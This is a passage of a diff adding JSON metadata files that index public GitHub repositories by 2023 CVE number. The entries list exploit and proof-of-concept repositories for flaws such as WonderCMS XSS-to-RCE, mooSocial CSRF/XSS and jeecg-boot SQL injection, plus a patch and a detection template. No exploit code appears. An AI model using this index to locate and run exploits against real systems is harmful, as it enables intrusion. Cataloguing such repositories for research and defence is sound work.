"Joomla-3.10.12-languagehelper-hotfix", + "full_name": "TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix", + "owner": { + "login": "TLWebdesign", + "id": 4402824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4402824?v=4", + "html_url": "https:\/\/github.com\/TLWebdesign", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix", + "description": "Plugin to fix security vulnerability CVE-2023-40626 in Joomla 3.10.12", + "fork": false, + "created_at": "2023-11-29T19:46:15Z", + "updated_at": "2024-05-20T11:38:12Z", + "pushed_at": "2024-02-21T01:11:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-40626", + "joomla", + "joomla3", + "php", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40868.json b/2023/CVE-2023-40868.json new file mode 100644 index 0000000000..9090d3bc6d --- /dev/null +++ b/2023/CVE-2023-40868.json @@ -0,0 +1,33 @@ +[ + { + "id": 686179384, + "name": "CVE-2023-40868", + "full_name": "MinoTauro2020\/CVE-2023-40868", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40868", + "description": " Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.", + "fork": false, + "created_at": "2023-09-02T00:24:22Z", + "updated_at": "2023-09-02T00:24:23Z", + "pushed_at": "2023-09-02T00:39:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40869.json b/2023/CVE-2023-40869.json new file mode 100644 index 0000000000..1838e07060 --- /dev/null +++ b/2023/CVE-2023-40869.json @@ -0,0 +1,33 @@ +[ + { + "id": 686183183, + "name": "CVE-2023-40869", + "full_name": "MinoTauro2020\/CVE-2023-40869", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40869", + "description": " Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions", + "fork": false, + "created_at": "2023-09-02T00:47:37Z", + "updated_at": "2023-09-02T00:47:37Z", + "pushed_at": "2023-09-02T00:58:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40924.json b/2023/CVE-2023-40924.json new file mode 100644 index 0000000000..0b4b73891c --- /dev/null +++ b/2023/CVE-2023-40924.json @@ -0,0 +1,33 @@ +[ + { + "id": 678880382, + "name": "CVE-2023-40924", + "full_name": "Yobing1\/CVE-2023-40924", + "owner": { + "login": "Yobing1", + "id": 135513064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135513064?v=4", + "html_url": "https:\/\/github.com\/Yobing1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yobing1\/CVE-2023-40924", + "description": "SolarView vuln", + "fork": false, + "created_at": "2023-08-15T15:44:58Z", + "updated_at": "2023-11-30T09:08:49Z", + "pushed_at": "2023-09-09T01:48:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40930.json b/2023/CVE-2023-40930.json new file mode 100644 index 0000000000..94fd945dd8 --- /dev/null +++ b/2023/CVE-2023-40930.json @@ -0,0 +1,33 @@ +[ + { + "id": 688584647, + "name": "CVE-2023-40930", + "full_name": "NSnidie\/CVE-2023-40930", + "owner": { + "login": "NSnidie", + "id": 88715174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88715174?v=4", + "html_url": "https:\/\/github.com\/NSnidie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSnidie\/CVE-2023-40930", + "description": " CVE-2023-40930 Repetition Enviroment", + "fork": false, + "created_at": "2023-09-07T16:50:02Z", + "updated_at": "2023-09-13T03:11:12Z", + "pushed_at": "2023-09-07T17:15:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40931.json b/2023/CVE-2023-40931.json new file mode 100644 index 0000000000..af5b48b4e8 --- /dev/null +++ b/2023/CVE-2023-40931.json @@ -0,0 +1,33 @@ +[ + { + "id": 792582569, + "name": "CVE-2023-40931-PoC", + "full_name": "sealldeveloper\/CVE-2023-40931-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40931-PoC", + "description": "The sqlmap payload to exploit CVE-2023-40931", + "fork": false, + "created_at": "2024-04-27T01:42:23Z", + "updated_at": "2024-06-06T07:25:30Z", + "pushed_at": "2024-04-27T01:43:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40933.json b/2023/CVE-2023-40933.json new file mode 100644 index 0000000000..99d6267300 --- /dev/null +++ b/2023/CVE-2023-40933.json @@ -0,0 +1,33 @@ +[ + { + "id": 792583023, + "name": "CVE-2023-40933-PoC", + "full_name": "sealldeveloper\/CVE-2023-40933-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40933-PoC", + "description": "The sqlmap payload to exploit CVE-2023-40933", + "fork": false, + "created_at": "2024-04-27T01:44:44Z", + "updated_at": "2024-04-27T01:46:43Z", + "pushed_at": "2024-04-27T01:46:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40989.json b/2023/CVE-2023-40989.json new file mode 100644 index 0000000000..1ca72a3e50 --- /dev/null +++ b/2023/CVE-2023-40989.json @@ -0,0 +1,33 @@ +[ + { + "id": 694154973, + "name": "CVE-2023-40989", + "full_name": "Zone1-Z\/CVE-2023-40989", + "owner": { + "login": "Zone1-Z", + "id": 145569866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145569866?v=4", + "html_url": "https:\/\/github.com\/Zone1-Z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zone1-Z\/CVE-2023-40989", + "description": "SQL injection vulnerbility in jeecgboot jeecg-boot v. allows a remote attacker to execute arbitrary code via a crafted request to the report\/jeecgboot\/jmreport\/queryFieldBySql component.", + "fork": false, + "created_at": "2023-09-20T12:43:23Z", + "updated_at": "2023-09-20T12:43:23Z", + "pushed_at": "2023-09-22T07:19:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41064.json b/2023/CVE-2023-41064.json new file mode 100644 index 0000000000..fa4ab94b2c --- /dev/null +++ b/2023/CVE-2023-41064.json @@ -0,0 +1,95 @@ +[ + { + "id": 712037145, + "name": "vulnerabilidad-LibWebP-CVE-2023-41064", + "full_name": "MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064", + "description": "longitudes de código para desencadenar esta vulnerabilidad", + "fork": false, + "created_at": "2023-10-30T17:03:24Z", + "updated_at": "2023-10-30T17:19:13Z", + "pushed_at": "2023-11-23T21:38:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718237903, + "name": "CVE-2023-41064", + "full_name": "MrR0b0t19\/CVE-2023-41064", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2023-41064", + "description": null, + "fork": false, + "created_at": "2023-11-13T17:07:02Z", + "updated_at": "2024-09-05T02:57:07Z", + "pushed_at": "2023-11-13T17:07:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753988072, + "name": "CVE-2023-41064-POC", + "full_name": "sarsaeroth\/CVE-2023-41064-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-41064-POC", + "description": "C implementation of Image I\/O 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T07:11:41Z", + "updated_at": "2024-03-22T17:09:51Z", + "pushed_at": "2024-02-07T07:11:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41080.json b/2023/CVE-2023-41080.json new file mode 100644 index 0000000000..c2e7580bee --- /dev/null +++ b/2023/CVE-2023-41080.json @@ -0,0 +1,33 @@ +[ + { + "id": 683435690, + "name": "CVE-2023-41080", + "full_name": "shiomiyan\/CVE-2023-41080", + "owner": { + "login": "shiomiyan", + "id": 35842766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4", + "html_url": "https:\/\/github.com\/shiomiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2023-41080", + "description": null, + "fork": false, + "created_at": "2023-08-26T15:11:31Z", + "updated_at": "2024-10-21T10:38:58Z", + "pushed_at": "2023-08-31T14:44:10Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41265.json b/2023/CVE-2023-41265.json new file mode 100644 index 0000000000..5eb961d669 --- /dev/null +++ b/2023/CVE-2023-41265.json @@ -0,0 +1,33 @@ +[ + { + "id": 685151719, + "name": "zeroqlik-detect", + "full_name": "praetorian-inc\/zeroqlik-detect", + "owner": { + "login": "praetorian-inc", + "id": 8173787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8173787?v=4", + "html_url": "https:\/\/github.com\/praetorian-inc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/praetorian-inc\/zeroqlik-detect", + "description": "A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)", + "fork": false, + "created_at": "2023-08-30T16:15:19Z", + "updated_at": "2024-08-26T16:00:12Z", + "pushed_at": "2023-08-30T18:28:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4128.json b/2023/CVE-2023-4128.json new file mode 100644 index 0000000000..05303187a8 --- /dev/null +++ b/2023/CVE-2023-4128.json @@ -0,0 +1,33 @@ +[ + { + "id": 693501334, + "name": "linux-4.1.15_CVE-2023-4128", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-4128", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-4128", + "description": null, + "fork": false, + "created_at": "2023-09-19T06:45:47Z", + "updated_at": "2023-09-19T06:52:28Z", + "pushed_at": "2023-09-19T08:02:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41362.json b/2023/CVE-2023-41362.json new file mode 100644 index 0000000000..f3501c75a2 --- /dev/null +++ b/2023/CVE-2023-41362.json @@ -0,0 +1,33 @@ +[ + { + "id": 689929838, + "name": "CVE-2023-41362_MyBB_ACP_RCE", + "full_name": "SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE", + "owner": { + "login": "SorceryIE", + "id": 74211927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74211927?v=4", + "html_url": "https:\/\/github.com\/SorceryIE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE", + "description": null, + "fork": false, + "created_at": "2023-09-11T07:49:38Z", + "updated_at": "2024-11-18T22:06:54Z", + "pushed_at": "2023-09-11T10:19:29Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41425.json b/2023/CVE-2023-41425.json new file mode 100644 index 0000000000..a709503472 --- /dev/null +++ b/2023/CVE-2023-41425.json @@ -0,0 +1,325 @@ +[ + { + "id": 714671678, + "name": "CVE-2023-41425", + "full_name": "prodigiousMind\/CVE-2023-41425", + "owner": { + "login": "prodigiousMind", + "id": 76691910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76691910?v=4", + "html_url": "https:\/\/github.com\/prodigiousMind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prodigiousMind\/CVE-2023-41425", + "description": "WonderCMS Authenticated RCE - CVE-2023-41425", + "fork": false, + "created_at": "2023-11-05T15:06:43Z", + "updated_at": "2024-11-16T12:48:38Z", + "pushed_at": "2023-11-06T18:56:53Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cves", + "exploit", + "rce-exploit", + "wondercms" + ], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841103105, + "name": "CVE-2023-41425", + "full_name": "charlesgargasson\/CVE-2023-41425", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-41425", + "description": "Wonder CMS RCE (XSS)", + "fork": false, + "created_at": "2024-08-11T16:43:56Z", + "updated_at": "2024-08-12T16:36:36Z", + "pushed_at": "2024-08-11T18:40:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-41425", + "exploit", + "htb", + "poc", + "rce", + "wondercms" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841302917, + "name": "CVE-2023-41425", + "full_name": "insomnia-jacob\/CVE-2023-41425", + "owner": { + "login": "insomnia-jacob", + "id": 174169862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174169862?v=4", + "html_url": "https:\/\/github.com\/insomnia-jacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insomnia-jacob\/CVE-2023-41425", + "description": "WonderCMS RCE CVE-2023-41425", + "fork": false, + "created_at": "2024-08-12T06:16:17Z", + "updated_at": "2024-11-12T07:54:22Z", + "pushed_at": "2024-08-12T06:55:30Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846300471, + "name": "CVE-2023-41425", + "full_name": "tiyeume25112004\/CVE-2023-41425", + "owner": { + "login": "tiyeume25112004", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/tiyeume25112004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiyeume25112004\/CVE-2023-41425", + "description": "Research", + "fork": false, + "created_at": "2024-08-22T23:27:48Z", + "updated_at": "2024-08-22T23:28:16Z", + "pushed_at": "2024-08-22T23:28:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848360316, + "name": "CVE-2023-41425-wonderCMS_RCE", + "full_name": "thefizzyfish\/CVE-2023-41425-wonderCMS_RCE", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-41425-wonderCMS_RCE", + "description": "CVE-2023-41425 - Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.", + "fork": false, + "created_at": "2024-08-27T16:10:08Z", + "updated_at": "2024-11-01T10:42:25Z", + "pushed_at": "2024-10-03T19:30:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851554006, + "name": "CVE-2023-41425", + "full_name": "Raffli-Dev\/CVE-2023-41425", + "owner": { + "login": "Raffli-Dev", + "id": 154855593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154855593?v=4", + "html_url": "https:\/\/github.com\/Raffli-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Raffli-Dev\/CVE-2023-41425", + "description": null, + "fork": false, + "created_at": "2024-09-03T09:59:42Z", + "updated_at": "2024-09-03T10:28:25Z", + "pushed_at": "2024-09-03T10:28:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866576110, + "name": "CVE-2023-41425", + "full_name": "duck-sec\/CVE-2023-41425", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-41425", + "description": "CVE-2023-41425 (Wonder CMS XSS to RCE) exploit which serves required scripts locally. Good if you're lost at sea and have found a problem with your bike.", + "fork": false, + "created_at": "2024-10-02T14:05:19Z", + "updated_at": "2024-11-18T11:21:43Z", + "pushed_at": "2024-10-02T14:20:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879409340, + "name": "WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "full_name": "0xDTC\/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "description": "CVE-2023-41425 Refurbish", + "fork": false, + "created_at": "2024-10-27T20:28:57Z", + "updated_at": "2024-10-27T20:32:02Z", + "pushed_at": "2024-10-27T20:31:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880915888, + "name": "CVE-2023-41425", + "full_name": "h3athen\/CVE-2023-41425", + "owner": { + "login": "h3athen", + "id": 48544502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48544502?v=4", + "html_url": "https:\/\/github.com\/h3athen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3athen\/CVE-2023-41425", + "description": "Writing one because the one I found isn't working", + "fork": false, + "created_at": "2024-10-30T15:38:52Z", + "updated_at": "2024-10-30T15:43:53Z", + "pushed_at": "2024-10-30T15:43:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893536910, + "name": "CVE-2023-41425-WonderCMS-Authenticated-RCE", + "full_name": "Diegomjx\/CVE-2023-41425-WonderCMS-Authenticated-RCE", + "owner": { + "login": "Diegomjx", + "id": 55863604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55863604?v=4", + "html_url": "https:\/\/github.com\/Diegomjx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diegomjx\/CVE-2023-41425-WonderCMS-Authenticated-RCE", + "description": "Xss injection, WonderCMS 3.2.0 -3.4.2 ", + "fork": false, + "created_at": "2024-11-24T17:39:45Z", + "updated_at": "2024-11-25T17:21:22Z", + "pushed_at": "2024-11-24T18:08:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41436.json b/2023/CVE-2023-41436.json new file mode 100644 index 0000000000..6943c2c7a1 --- /dev/null +++ b/2023/CVE-2023-41436.json @@ -0,0 +1,33 @@ +[ + { + "id": 682073746, + "name": "CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "full_name": "sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "description": "CSZ CMS 1.3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Additional Meta Tag parameter in the Pages Content Menu.", + "fork": false, + "created_at": "2023-08-23T11:34:30Z", + "updated_at": "2023-09-25T14:18:40Z", + "pushed_at": "2023-09-22T12:20:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4145.json b/2023/CVE-2023-4145.json new file mode 100644 index 0000000000..d0343ca838 --- /dev/null +++ b/2023/CVE-2023-4145.json @@ -0,0 +1,95 @@ +[ + { + "id": 786354655, + "name": "CVE-2023-4145-2", + "full_name": "miguelc49\/CVE-2023-4145-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:01Z", + "updated_at": "2024-04-14T17:40:27Z", + "pushed_at": "2024-04-14T17:40:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354666, + "name": "CVE-2023-4145-1", + "full_name": "miguelc49\/CVE-2023-4145-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:04Z", + "updated_at": "2024-04-14T17:40:24Z", + "pushed_at": "2024-04-14T17:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354680, + "name": "CVE-2023-4145-3", + "full_name": "miguelc49\/CVE-2023-4145-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-3", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:09Z", + "updated_at": "2024-04-14T17:40:32Z", + "pushed_at": "2024-04-14T17:40:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41474.json b/2023/CVE-2023-41474.json new file mode 100644 index 0000000000..e4e72e231d --- /dev/null +++ b/2023/CVE-2023-41474.json @@ -0,0 +1,33 @@ +[ + { + "id": 740379330, + "name": "CVE-2023-41474", + "full_name": "JBalanza\/CVE-2023-41474", + "owner": { + "login": "JBalanza", + "id": 